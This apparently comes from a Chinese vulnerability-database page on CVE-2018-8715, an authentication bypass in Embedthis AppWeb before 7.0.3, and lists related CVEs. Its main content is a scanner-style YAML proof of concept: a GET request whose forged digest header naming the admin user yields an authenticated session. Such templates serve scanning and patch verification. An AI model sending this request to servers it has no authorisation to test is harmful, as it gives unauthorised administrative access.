CVE-2018-8715: AppWeb Authentication Bypass vulnerability

日期: 2025-09-01 | 影响软件: AppWeb | POC: 已公开

漏洞描述

The Embedthis HTTP library, and Appweb versions before 7.0.3, have a logic flaw related to the authCondition function in http/httpLib.c. With a forged HTTP request, it is possible to bypass authentication for the form and digest login types.

PoC代码[已公开]

id: CVE-2018-8715

info:
  name: AppWeb Authentication Bypass vulnerability
  author: milo2012
  severity: high
  description: The Embedthis HTTP library, and Appweb versions before 7.0.3, have a logic flaw related to the authCondition function in http/httpLib.c. With a forged HTTP request, it is possible to bypass authentication for the form and digest login types.
  reference:
    - https://github.com/embedthis/appweb/issues/610
    - https://blogs.securiteam.com/index.php/archives/3676
    - https://security.paloaltonetworks.com/CVE-2018-8715

rules:
  r0:
    request:
      method: GET
      path: /
      headers:
        Authorization: Digest username=admin
    expression: response.status == 200 && response.raw_header.bcontains(b'Set-Cookie:') && response.raw_header.bcontains(b'<a class="logo" href="https://embedthis.com/">&nbsp;</a>')
expression: r0()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2018/CVE-2018-8715.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

CVE-2018-8715: AppWeb - Authentication Bypass POC

新华通工程质量检测试验中心网上委托系统XhtAppWebSet.ashx SQL注入漏洞 无POC

AppWeb认证绕过漏洞（CVE-2018-8715） 无POC

CVE-2018-1000600: Pre-auth Fully-responded SSRF POC

CVE-2018-1000861: Jenkins 2.138 Remote Command Execution POC

新华通工程质量检测试验中心网上委托系统XhtAppWebSet.ashx SQL注入漏洞无POC

AppWeb认证绕过漏洞（CVE-2018-8715）无POC